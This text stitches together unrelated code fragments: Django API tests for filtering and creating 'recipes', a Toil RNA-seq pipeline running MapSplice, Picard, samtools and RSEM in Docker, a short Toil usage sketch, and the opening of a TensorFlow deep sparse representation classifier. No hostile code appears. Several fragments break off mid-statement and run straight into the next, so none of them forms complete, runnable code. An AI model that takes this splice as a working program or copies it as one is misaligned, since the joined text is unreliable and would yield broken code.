file_size=104857600.0, source_started=self.date_1, source_ended=self.date_2, source_sensor_class=self.s_class, source_sensor=self.s_sensor, source_collection=self.collection, source_task=self.task) self.file2 = storage_test_utils.create_file(workspace=self.workspace, file_size=104857600.0, source_started=self.date_3, source_ended=self.date_4, source_sensor_class=self.s_class2, source_sensor=self.s_sensor2, source_collection=self.collection2, source_task=self.task2) self.data = {'version': '6', 'files': {'INPUT_FILE': [self.file1.id]}, 'json': {'INPUT_JSON': 'hello'}} self.data2 = {'version': '6', 'files': {'INPUT_FILE': [self.file2.id]}, 'json': {'INPUT_JSON': 'hello2'}} self.recipe_type = recipe_test_utils.create_recipe_type_v6(name='my-type', definition=def_v6_dict) self.recipe1 = recipe_test_utils.create_recipe(recipe_type=self.recipe_type, input=self.data) self.recipe_type2 = recipe_test_utils.create_recipe_type_v6(name='my-type2', definition=def_v6_dict) self.recipe2 = recipe_test_utils.create_recipe(recipe_type=self.recipe_type2, input=self.data2) self.recipe3 = recipe_test_utils.create_recipe(is_superseded=True) recipe_test_utils.process_recipe_inputs([self.recipe1.id, self.recipe2.id, self.recipe3.id]) def test_successful_all(self): """Tests getting recipes""" url = '/%s/recipes/' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 5) # check new/removed fields for result in results['results']: if result['id'] == self.recipe1.id: self.assertIn('recipe', result) self.assertIn('batch', result) self.assertEqual(result['input_file_size'], 100.0) self.assertEqual(result['source_started'], '2016-01-01T00:00:00Z') self.assertEqual(result['source_ended'], '2016-01-02T00:00:00Z') self.assertEqual(result['source_sensor_class'], self.s_class) self.assertEqual(result['source_sensor'], self.s_sensor) self.assertEqual(result['source_collection'], self.collection) self.assertEqual(result['source_task'], self.task) self.assertEqual(result['jobs_total'], 2) self.assertEqual(result['jobs_pending'], 0) self.assertEqual(result['jobs_blocked'], 0) self.assertEqual(result['jobs_queued'], 2) self.assertEqual(result['jobs_running'], 0) self.assertEqual(result['jobs_failed'], 0) self.assertEqual(result['jobs_completed'], 0) self.assertEqual(result['jobs_canceled'], 0) self.assertEqual(result['sub_recipes_total'], 1) self.assertEqual(result['sub_recipes_completed'], 0) self.assertFalse(result['is_completed']) self.assertNotIn('root_superseded_recipe', result) self.assertNotIn('superseded_by_recipe', result) else: id = result['id'] if result['recipe']: id = result['recipe']['id'] self.assertTrue(id in [self.recipe1.id, self.recipe2.id]) else: self.assertTrue(id in [self.recipe2.id, self.recipe3.id]) def test_time_successful(self): """Tests successfully calling the get recipes by time""" yesterday = timezone.now().date() - timezone.timedelta(days=1) yesterday = yesterday.isoformat() + 'T00:00:00Z' today = timezone.now().date() today = today.isoformat() + 'T00:00:00Z' tomorrow = timezone.now().date() + timezone.timedelta(days=1) tomorrow = tomorrow.isoformat() + 'T00:00:00Z' url = '/%s/recipes/?started=%s&ended=%s' % (self.api, today, tomorrow) response = self.client.get(url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) results = result['results'] self.assertEqual(len(results), 5) url = 
'/%s/recipes/?started=%s&ended=%s' % (self.api, yesterday, today) response = self.client.get(url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) results = result['results'] self.assertEqual(len(results), 0) def test_source_time_successful(self): """Tests successfully calling the get recipes by source time""" url = '/%s/recipes/?source_started=%s&source_ended=%s' % (self.api, '2016-01-01T00:00:00Z', '2016-01-02T00:00:00Z') response = self.client.get(url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) results = result['results'] self.assertEqual(len(results), 1) for result in results: self.assertTrue(result['id'] in [self.recipe1.id]) def test_source_sensor_class(self): """Tests successfully calling the recipes view filtered by source sensor class.""" url = '/%s/recipes/?source_sensor_class=%s' % (self.api, self.s_class) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) self.assertEqual(len(result['results']), 1) self.assertEqual(result['results'][0]['source_sensor_class'], self.s_class) def test_source_sensor(self): """Tests successfully calling the recipes view filtered by source sensor.""" url = '/%s/recipes/?source_sensor=%s' % (self.api, self.s_sensor) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) self.assertEqual(len(result['results']), 1) self.assertEqual(result['results'][0]['source_sensor'], self.s_sensor) def test_source_collection(self): """Tests successfully calling the recipes view filtered by source collection.""" url = '/%s/recipes/?source_collection=%s' % (self.api, self.collection) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) self.assertEqual(len(result['results']), 1) self.assertEqual(result['results'][0]['source_collection'], self.collection) def test_source_task(self): """Tests successfully calling the recipes view filtered by source task.""" url = '/%s/recipes/?source_task=%s' % (self.api, self.task) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) self.assertEqual(len(result['results']), 1) self.assertEqual(result['results'][0]['source_task'], self.task) def test_successful_id(self): """Tests getting recipes by id""" url = '/%s/recipes/?recipe_id=%s' % (self.api, self.recipe1.id) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) self.assertEqual(results['results'][0]['id'], self.recipe1.id) def test_successful_recipe_type_id(self): """Tests getting recipes by type id""" url = '/%s/recipes/?recipe_type_id=%s' % (self.api, self.recipe_type.id) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) self.assertEqual(results['results'][0]['recipe_type']['id'], self.recipe_type.id) def test_successful_recipe_type_name(self): """Tests getting recipes by type name""" url = '/%s/recipes/?recipe_type_name=my-type' % self.api 
response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) self.assertEqual(results['results'][0]['recipe_type']['name'], 'my-type') def test_successful_batch(self): """Tests getting recipes by batch id""" batch = batch_test_utils.create_batch() self.recipe1.batch_id = batch.id self.recipe1.save() url = '/%s/recipes/?batch_id=%d' % (self.api, batch.id) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) self.assertEqual(results['results'][0]['recipe_type']['id'], self.recipe_type.id) def test_successful_superseded(self): """Tests getting superseded recipes""" url = '/%s/recipes/?is_superseded=true' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) url = '/%s/recipes/?is_superseded=false' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 4) def test_successful_completed(self): """Tests getting completed recipes""" url = '/%s/recipes/?is_completed=true' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 0) url = '/%s/recipes/?is_completed=false' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 5) def test_successful_order(self): """Tests ordering recipes""" url = '/%s/recipes/?order=-source_sensor_class' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['results'][4]['source_sensor_class'], 'A') class TestRecipesPostViewV6(APITransactionTestCase): api = 'v6' def setUp(self): django.setup() rest.login_client(self.client, is_staff=True) self.workspace = storage_test_utils.create_workspace() self.source_file = source_test_utils.create_source(workspace=self.workspace) self.jt1 = job_test_utils.create_seed_job_type() self.jt2 = job_test_utils.create_seed_job_type() self.def_v6_dict = {'version': '6', 'input': { 'files': [{'name': 'INPUT_IMAGE', 'media_types': ['image/tiff'], 'required': True, 'multiple': True}], 'json': []}, 'nodes': {'node_a': {'dependencies': [], 'input': {'INPUT_IMAGE': {'type': 'recipe', 'input': 'INPUT_IMAGE'}}, 'node_type': {'node_type': 'job', 'job_type_name': self.jt1.name, 'job_type_version': self.jt1.version, 'job_type_revision': 1}}, 'node_b': {'dependencies': [{'name': 'node_a'}], 'input': {'INPUT_IMAGE': {'type': 'dependency', 'node': 'node_a', 'output': 'OUTPUT_IMAGE'}}, 'node_type': {'node_type': 'job', 'job_type_name': self.jt2.name, 'job_type_version': self.jt2.version, 'job_type_revision': 1}} } } self.recipe_type = recipe_test_utils.create_recipe_type_v6(definition=self.def_v6_dict) self.inactive_recipe_type = recipe_test_utils.create_recipe_type_v6(definition=self.def_v6_dict, is_active=False) 
@patch('queue.models.CommandMessageManager') @patch('queue.models.create_process_recipe_input_messages') def test_successful_v1data(self, mock_create, mock_msg_mgr): data_dict = { 'version': '1.0', 'input_data': [{ 'name': 'INPUT_IMAGE', 'file_id': self.source_file.id, }], 'output_data': [{ 'name': 'output_a', 'workspace_id': self.workspace.id }] } json_data = { "input" : data_dict, "recipe_type_id" : self.recipe_type.pk } url = '/%s/recipes/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content) #Response should be new v6 recipe detail response result = json.loads(response.content) self.assertTrue('data' not in result) self.assertTrue('/%s/recipes/' % self.api in response['location']) mock_create.assert_called_once() @patch('queue.models.CommandMessageManager') @patch('queue.models.create_process_recipe_input_messages') def test_successful_v6data(self, mock_create, mock_msg_mgr): data = {'version': '6', 'files': {'INPUT_IMAGE': [self.source_file.id]}, 'json':
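# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original tests): the shape of a v6
# recipe-creation request exercised above. IDs are placeholders; the payload
# pairs a Seed-style data dict with the recipe type primary key and is POSTed
# to /v6/recipes/ as application/json.
example_recipe_request = {
    "input": {
        "version": "6",
        "files": {"INPUT_IMAGE": [1234]},   # source file IDs
        "json": {},
    },
    "recipe_type_id": 42,
}
# self.client.generic('POST', '/v6/recipes/',
#                     json.dumps(example_recipe_request), 'application/json')
# ---------------------------------------------------------------------------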
the rest of the pipelines ids: dict Dictionary of fileStore IDS input_args: dict Dictionary of input arguments sample: tuple Contains uuid and sample_url """ if len(sample) == 2: uuid, sample_location = sample url1, url2 = None, None else: uuid, url1, url2 = sample sample_location = None # Update values unique to sample sample_input = dict(input_args) sample_input['uuid'] = uuid sample_input['sample.tar'] = sample_location if sample_input['output_dir']: sample_input['output_dir'] = os.path.join(input_args['output_dir'], uuid) sample_input['cpu_count'] = multiprocessing.cpu_count() job_vars = (sample_input, ids) # Download or locate local file and place in the jobStore if sample_input['input']: ids['sample.tar'] = job.fileStore.writeGlobalFile(os.path.abspath(sample_location)) elif sample_input['config_fastq']: ids['R1.fastq'] = job.fileStore.writeGlobalFile(urlparse(url1).path) ids['R2.fastq'] = job.fileStore.writeGlobalFile(urlparse(url2).path) else: if sample_input['ssec']: ids['sample.tar'] = job.addChildJobFn(download_encrypted_file, sample_input, 'sample.tar', disk='25G').rv() else: ids['sample.tar'] = job.addChildJobFn(download_from_url, sample_input['sample.tar'], disk='25G').rv() job.addFollowOnJobFn(static_dag_launchpoint, job_vars) def static_dag_launchpoint(job, job_vars): """ Statically define jobs in the pipeline job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars if input_args['config_fastq']: cores = input_args['cpu_count'] a = job.wrapJobFn(mapsplice, job_vars, cores=cores, disk='130G').encapsulate() else: a = job.wrapJobFn(merge_fastqs, job_vars, disk='70 G').encapsulate() b = job.wrapJobFn(consolidate_output, job_vars, a.rv()) # Take advantage of "encapsulate" to simplify pipeline wiring job.addChild(a) a.addChild(b) def merge_fastqs(job, job_vars): """ Unzips input sample and concats the Read1 and Read2 groups together. job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() cores = input_args['cpu_count'] single_end_reads = input_args['single_end_reads'] # I/O sample = return_input_paths(job, work_dir, ids, 'sample.tar') # Untar File # subprocess.check_call(['unzip', sample, '-d', work_dir]) subprocess.check_call(['tar', '-xvf', sample, '-C', work_dir]) # Remove large files before creating concat versions. os.remove(os.path.join(work_dir, 'sample.tar')) # Zcat files in parallel if single_end_reads: files = sorted(glob.glob(os.path.join(work_dir, '*'))) with open(os.path.join(work_dir, 'R1.fastq'), 'w') as f1: subprocess.check_call(['zcat'] + files, stdout=f1) # FileStore ids['R1.fastq'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'R1.fastq')) else: r1_files = sorted(glob.glob(os.path.join(work_dir, '*R1*'))) r2_files = sorted(glob.glob(os.path.join(work_dir, '*R2*'))) with open(os.path.join(work_dir, 'R1.fastq'), 'w') as f1: p1 = subprocess.Popen(['zcat'] + r1_files, stdout=f1) with open(os.path.join(work_dir, 'R2.fastq'), 'w') as f2: p2 = subprocess.Popen(['zcat'] + r2_files, stdout=f2) p1.wait() p2.wait() # FileStore ids['R1.fastq'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'R1.fastq')) ids['R2.fastq'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'R2.fastq')) job.fileStore.deleteGlobalFile(ids['sample.tar']) # Spawn child job return job.addChildJobFn(mapsplice, job_vars, cores=cores, disk='130 G').rv() def mapsplice(job, job_vars): """ Maps RNA-Seq reads to a reference genome. 
job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() cores = input_args['cpu_count'] sudo = input_args['sudo'] single_end_reads = input_args['single_end_reads'] files_to_delete = ['R1.fastq'] # I/O return_input_paths(job, work_dir, ids, 'ebwt.zip', 'chromosomes.zip') if single_end_reads: return_input_paths(job, work_dir, ids, 'R1.fastq') else: return_input_paths(job, work_dir, ids, 'R1.fastq', 'R2.fastq') files_to_delete.extend(['R2.fastq']) for fname in ['chromosomes.zip', 'ebwt.zip']: subprocess.check_call(['unzip', '-o', os.path.join(work_dir, fname), '-d', work_dir]) # Command and call parameters = ['-p', str(cores), '-s', '25', '--bam', '--min-map-len', '50', '-x', '/data/ebwt', '-c', '/data/chromosomes', '-1', '/data/R1.fastq', '-o', '/data'] if not single_end_reads: parameters.extend(['-2', '/data/R2.fastq']) docker_call(tool='quay.io/ucsc_cgl/mapsplice:2.1.8--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=parameters, work_dir=work_dir, sudo=sudo) # Write to FileStore for fname in ['alignments.bam', 'stats.txt']: ids[fname] = job.fileStore.writeGlobalFile(os.path.join(work_dir, fname)) for fname in files_to_delete: job.fileStore.deleteGlobalFile(ids[fname]) # Run child job # map_id = job.addChildJobFn(mapping_stats, job_vars).rv() if input_args['upload_bam_to_s3'] and input_args['s3_dir']: job.addChildJobFn(upload_bam_to_s3, job_vars) output_ids = job.addChildJobFn(add_read_groups, job_vars, disk='30 G').rv() return output_ids def mapping_stats(job, job_vars): """ This function is not currently in use. job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O return_input_paths(job, work_dir, ids, 'stats.txt') uuid = input_args['uuid'] # Command docker_call(tool='jvivian/mapping_stats', tool_parameters=[uuid], work_dir=work_dir, sudo=sudo) # Zip output files and store output_files = ['{}_stats2.txt'.format(uuid), '{}_stats_all.txt'.format(uuid), '{}_mapping.tab'.format(uuid)] tarball_files(work_dir, tar_name='map.tar.gz', files=output_files) return job.fileStore.writeGlobalFile(os.path.join(work_dir, 'map.tar.gz')) def add_read_groups(job, job_vars): """ This function adds read groups to the headers job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O alignments = return_input_paths(job, work_dir, ids, 'alignments.bam') output = os.path.join(work_dir, 'rg_alignments.bam') # Command and callg parameter = ['AddOrReplaceReadGroups', 'INPUT={}'.format(docker_path(alignments)), 'OUTPUT={}'.format(docker_path(output)), 'RGSM={}'.format(input_args['uuid']), 'RGID={}'.format(input_args['uuid']), 'RGLB=TruSeq', 'RGPL=illumina', 'RGPU=barcode', 'VALIDATION_STRINGENCY=SILENT'] docker_call(tool='quay.io/ucsc_cgl/picardtools:1.95--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=parameter, work_dir=work_dir, sudo=sudo) # Write to FileStore ids['rg_alignments.bam'] = job.fileStore.writeGlobalFile(output) # Run child job return job.addChildJobFn(bamsort_and_index, job_vars, disk='30 G').rv() def bamsort_and_index(job, job_vars): """ Sorts bam file and produces index file job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # 
I/O rg_alignments = return_input_paths(job, work_dir, ids, 'rg_alignments.bam') output = os.path.join(work_dir, 'sorted.bam') # Command -- second argument is "Output Prefix" cmd1 = ['sort', docker_path(rg_alignments), docker_path('sorted')] cmd2 = ['index', docker_path(output)] docker_call(tool='quay.io/ucsc_cgl/samtools:0.1.19--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=cmd1, work_dir=work_dir, sudo=sudo) docker_call(tool='quay.io/ucsc_cgl/samtools:0.1.19--dd5ac549b95eb3e5d166a5e310417ef13651994e', tool_parameters=cmd2, work_dir=work_dir, sudo=sudo) # Write to FileStore ids['sorted.bam'] = job.fileStore.writeGlobalFile(output) ids['sorted.bam.bai'] = job.fileStore.writeGlobalFile(os.path.join(work_dir, 'sorted.bam.bai')) # Run child job output_ids = job.addChildJobFn(sort_bam_by_reference, job_vars, disk='50 G').rv() rseq_id = job.addChildJobFn(rseq_qc, job_vars, disk='20 G').rv() return rseq_id, output_ids def rseq_qc(job, job_vars): """ QC module: contains QC metrics and information about the BAM post alignment job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() uuid = input_args['uuid'] sudo = input_args['sudo'] # I/O return_input_paths(job, work_dir, ids, 'sorted.bam', 'sorted.bam.bai') # Command docker_call(tool='jvivian/qc', tool_parameters=['/opt/cgl-docker-lib/RseqQC_v2.sh', '/data/sorted.bam', uuid], work_dir=work_dir, sudo=sudo) # Write to FileStore output_files = [f for f in glob.glob(os.path.join(work_dir, '*')) if 'sorted.bam' not in f] tarball_files(work_dir, tar_name='qc.tar.gz', uuid=None, files=output_files) return job.fileStore.writeGlobalFile(os.path.join(work_dir, 'qc.tar.gz')) def sort_bam_by_reference(job, job_vars): """ Sorts the bam by reference job_vars: tuple Tuple of dictionaries: input_args and ids """ # Unpack variables input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() # I/O sorted_bam, sorted_bai = return_input_paths(job, work_dir, ids, 'sorted.bam', 'sorted.bam.bai') output = os.path.join(work_dir, 'sort_by_ref.bam') # Call: Samtools ref_seqs = [] handle = subprocess.Popen(["samtools", "view", "-H", sorted_bam], stdout=subprocess.PIPE).stdout for line in handle: if line.startswith("@SQ"): tmp = line.split("\t") chrom = tmp[1].split(":")[1] ref_seqs.append(chrom) handle.close() # Iterate through chromosomes to create mini-bams for chrom in ref_seqs: # job.addChildJobFn(sbbr_child, chrom, os.path.join(work_dir, chrom), sorted_bam) cmd_view = ["samtools", "view", "-b", sorted_bam, chrom] cmd_sort = ["samtools", "sort", "-m", "3000000000", "-n", "-", os.path.join(work_dir, chrom)] p1 = subprocess.Popen(cmd_view, stdout=subprocess.PIPE) subprocess.check_call(cmd_sort, stdin=p1.stdout) sorted_files = [os.path.join(work_dir, chrom) + '.bam' for chrom in ref_seqs] cmd = ["samtools", "cat", "-o", output] + sorted_files subprocess.check_call(cmd) # Write to FileStore ids['sort_by_ref.bam'] = job.fileStore.writeGlobalFile(output) rsem_id = job.addChildJobFn(transcriptome, job_vars, disk='30 G', memory='30 G').rv() exon_id = job.addChildJobFn(exon_count, job_vars, disk='30 G').rv() return exon_id, rsem_id def exon_count(job, job_vars): """ Produces exon counts job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() uuid = input_args['uuid'] sudo = input_args['sudo'] # I/O sort_by_ref, normalize_pl, composite_bed = return_input_paths(job, work_dir, ids, 'sort_by_ref.bam', 
'normalize.pl', 'composite_exons.bed') # Command tool = 'jvivian/bedtools' cmd_1 = ['coverage', '-split', '-abam', docker_path(sort_by_ref), '-b', docker_path(composite_bed)] cmd_2 = ['perl', os.path.join(work_dir, 'normalize.pl'), sort_by_ref, composite_bed] popen_docker = ['docker', 'run', '-v', '{}:/data'.format(work_dir), tool] if sudo: popen_docker = ['sudo'] + popen_docker p = subprocess.Popen(popen_docker + cmd_1, stdout=subprocess.PIPE) with open(os.path.join(work_dir, 'exon_quant'), 'w') as f: subprocess.check_call(cmd_2, stdin=p.stdout, stdout=f) p1 = subprocess.Popen(['cat', os.path.join(work_dir, 'exon_quant')], stdout=subprocess.PIPE) p2 = subprocess.Popen(['tr', '":"', '"\t"'], stdin=p1.stdout, stdout=subprocess.PIPE) p3 = subprocess.Popen(['tr', '"-"', '"\t"'], stdin=p2.stdout, stdout=subprocess.PIPE) with open(os.path.join(work_dir, 'exon_quant.bed'), 'w') as f: subprocess.check_call(['cut', '-f1-4'], stdin=p3.stdout, stdout=f) # Create zip, upload to fileStore, and move to output_dir as a backup output_files = ['exon_quant.bed', 'exon_quant'] tarball_files(work_dir, tar_name='exon.tar.gz', uuid=uuid, files=output_files) return job.fileStore.writeGlobalFile(os.path.join(work_dir, 'exon.tar.gz')) def transcriptome(job, job_vars): """ Creates a bam of just the transcriptome job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() sudo = input_args['sudo'] # I/O sort_by_ref, bed, hg19_fa = return_input_paths(job, work_dir, ids, 'sort_by_ref.bam', 'unc.bed', 'hg19.transcripts.fa') output = os.path.join(work_dir, 'transcriptome.bam') # Command parameters = ['sam-xlate', '--bed', docker_path(bed), '--in', docker_path(sort_by_ref), '--order', docker_path(hg19_fa), '--out', docker_path(output), '--xgtag', '--reverse'] docker_call(tool='quay.io/ucsc_cgl/ubu:1.2--02806964cdf74bf5c39411b236b4c4e36d026843', tool_parameters=parameters, work_dir=work_dir, java_opts='-Xmx30g', sudo=sudo) # Write to FileStore ids['transcriptome.bam'] = job.fileStore.writeGlobalFile(output) # Run child job return job.addChildJobFn(filter_bam, job_vars, memory='30G', disk='30G').rv() def filter_bam(job, job_vars): """ Performs filtering on the transcriptome bam job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() cores = input_args['cpu_count'] sudo = input_args['sudo'] # I/O transcriptome_bam = return_input_paths(job, work_dir, ids, 'transcriptome.bam') output = os.path.join(work_dir, 'filtered.bam') # Command parameters = ['sam-filter', '--strip-indels', '--max-insert', '1000', '--mapq', '1', '--in', docker_path(transcriptome_bam), '--out', docker_path(output)] docker_call(tool='quay.io/ucsc_cgl/ubu:1.2--02806964cdf74bf5c39411b236b4c4e36d026843', tool_parameters=parameters, work_dir=os.path.dirname(output), java_opts='-Xmx30g', sudo=sudo) # Write to FileStore ids['filtered.bam'] = job.fileStore.writeGlobalFile(output) # Run child job return job.addChildJobFn(rsem, job_vars, cores=cores, disk='30 G').rv() def rsem(job, job_vars): """ Runs RSEM to produce counts job_vars: tuple Tuple of dictionaries: input_args and ids """ input_args, ids = job_vars work_dir = job.fileStore.getLocalTempDir() cpus = input_args['cpu_count'] sudo = input_args['sudo'] single_end_reads = input_args['single_end_reads'] # I/O filtered_bam, rsem_ref = return_input_paths(job, work_dir, ids, 'filtered.bam', 'rsem_ref.zip') subprocess.check_call(['unzip', '-o', os.path.join(work_dir,
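A minimal sketch (hypothetical job functions, not part of the pipeline above) of the Toil wiring pattern that static_dag_launchpoint relies on: wrap a job function, call encapsulate() so its whole subtree behaves as one node, then hang a consumer of its promised return value (rv()) off it. The entry point follows Toil's standard quickstart usage; job-store path and function names are illustrative.

from toil.job import Job

def produce(job, x):
    # stand-in for merge_fastqs/mapsplice; returns a value consumed downstream
    return x + 1

def consume(job, produced):
    # stand-in for consolidate_output
    return 'got {}'.format(produced)

def launchpoint(job, x):
    # same pattern as static_dag_launchpoint: encapsulate the multi-step branch,
    # then chain the consumer of its promise
    a = job.wrapJobFn(produce, x).encapsulate()
    b = job.wrapJobFn(consume, a.rv())
    job.addChild(a)
    a.addChild(b)

if __name__ == '__main__':
    options = Job.Runner.getDefaultOptions('./toil-jobstore')  # illustrative path
    Job.Runner.startToil(Job.wrapJobFn(launchpoint, 1), options)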
<gh_stars>1-10 # Deep Sparse Representation-based Classification # https://arxiv.org/abs/1904.11093 # <NAME> # <EMAIL> # Built upon https://github.com/panji1990/Deep-subspace-clustering-networks # and https://github.com/mahdiabavisani/Deep-multimodal-subspace-clustering-networks # # Citation: <NAME> and <NAME>, "Deep sparse representation-based clas- sification," # IEEE Signal Processing Letters, vol. 26, no. 6, pp. 948-952, June 2019. # DOI:10.1109/LSP.2019.2913022 import tensorflow as tf import numpy as np from tensorflow.contrib import layers import scipy.io as sio import argparse import random class ConvAE(object): def __init__(self, n_input, kernel_size, n_hidden, reg_constant1=1.0, re_constant2=1.0, batch_size=200, train_size=100,reg=None, \ denoise=False, model_path=None, restore_path=None, \ logs_path='./logs'): self.n_input = n_input self.kernel_size = kernel_size self.n_hidden = n_hidden self.batch_size = batch_size self.train_size = train_size self.test_size = batch_size - train_size self.reg = reg self.model_path = model_path self.restore_path = restore_path self.iter = 0 tf.set_random_seed(2019) weights = self._initialize_weights() # input required to be fed self.train = tf.placeholder(tf.float32, [None, self.n_input[0], self.n_input[1], 1]) self.test = tf.placeholder(tf.float32, [None, self.n_input[0], self.n_input[1], 1]) self.learning_rate = tf.placeholder(tf.float32, [],name='learningRate') self.x = tf.concat([self.train, self.test], axis=0) #Concat testing and training samples latent, latents, shape = self.encoder(self.x, weights) latent_shape = tf.shape(latent) # Slice the latent space features to separate training and testing latent features latent_train = tf.slice(latent,[0,0,0,0],[self.train_size, latent_shape[1], latent_shape[2], latent_shape[3]]) latent_test = tf.slice(latent,[self.train_size,0,0,0],[self.test_size, latent_shape[1], latent_shape[2], latent_shape[3]]) # Vectorize the features z_train = tf.reshape(latent_train, [self.train_size, -1]) z_test = tf.reshape(latent_test, [self.test_size, -1]) z = tf.reshape(latent, [self.batch_size, -1]) Coef = weights['Coef'] # This is \theta in the paper z_test_c = tf.matmul(Coef, z_train) z_c = tf.concat([z_train, z_test_c], axis=0) latent_c_test = tf.reshape(z_test_c, tf.shape(latent_test)) latent_c_pretrain = tf.concat([latent_train, latent_test], axis=0) # used in pretraining stage latent_c = tf.concat([latent_train, latent_c_test], axis=0) # used in the main model self.x_r_pretrain = self.decoder(latent_c_pretrain, weights, shape) # used in pretraining stage self.x_r = self.decoder(latent_c, weights, shape) # used in the main model self.Coef_test = Coef self.AE = tf.concat([z_train, z_test], axis=0) # Autoencoder features to be used in benchmarks comparison # l_2 reconstruction loss self.loss_pretrain = tf.reduce_sum(tf.pow(tf.subtract(self.x, self.x_r_pretrain), 2.0)) self.reconst_cost_x = tf.reduce_sum(tf.pow(tf.subtract(self.x, self.x_r), 2.0)) tf.summary.scalar("recons_loss", self.reconst_cost_x) self.reg_losses = tf.reduce_sum(tf.pow(Coef, 2.0)) tf.summary.scalar("reg_loss", reg_constant1 * self.reg_losses) self.selfexpress_losses = 0.5 * tf.reduce_sum(tf.pow(tf.subtract(z_c, z), 2.0)) tf.summary.scalar("selfexpress_loss", re_constant2 * self.selfexpress_losses) # TOTAL LOSS self.loss = self.reconst_cost_x + reg_constant1 * self.reg_losses + 0.5 * re_constant2 * self.selfexpress_losses self.merged_summary_op = tf.summary.merge_all() self.optimizer = 
tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize( self.loss) # GradientDescentOptimizer #AdamOptimizer self.optimizer_pretrain = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize( self.loss_pretrain) # GradientDescentOptimizer #AdamOptimizer self.init = tf.global_variables_initializer() tfconfig = tf.ConfigProto(allow_soft_placement=True) tfconfig.gpu_options.allow_growth = True self.sess = tf.InteractiveSession(config=tfconfig) self.sess.run(self.init) self.saver = tf.train.Saver([v for v in tf.trainable_variables() if not (v.name.startswith("Coef"))]) # to save the pretrained model self.summary_writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph()) def _initialize_weights(self): ''' initializes weights for the model and soters them in a dictionary. ''' all_weights = dict() all_weights['enc_w0'] = tf.get_variable("enc_w0", shape=[self.kernel_size[0], self.kernel_size[0], 1, self.n_hidden[0]], initializer=layers.xavier_initializer_conv2d()) all_weights['enc1_b0'] = tf.Variable(tf.zeros([self.n_hidden[0]], dtype=tf.float32)) all_weights['enc_b0'] = tf.Variable(tf.zeros([self.n_hidden[0]], dtype=tf.float32)) all_weights['enc_w1'] = tf.get_variable("enc_w1", shape=[self.kernel_size[1], self.kernel_size[1], self.n_hidden[0], self.n_hidden[1]], initializer=layers.xavier_initializer_conv2d()) all_weights['enc_b1'] = tf.Variable(tf.zeros([self.n_hidden[1]], dtype=tf.float32)) all_weights['enc_w2'] = tf.get_variable("enc_w2", shape=[self.kernel_size[2], self.kernel_size[2], self.n_hidden[1], self.n_hidden[2]], initializer=layers.xavier_initializer_conv2d()) all_weights['enc_b2'] = tf.Variable(tf.zeros([self.n_hidden[2]], dtype=tf.float32)) all_weights['dec_w0'] = tf.get_variable("dec1_w0", shape=[self.kernel_size[2], self.kernel_size[2], self.n_hidden[1], self.n_hidden[3]], 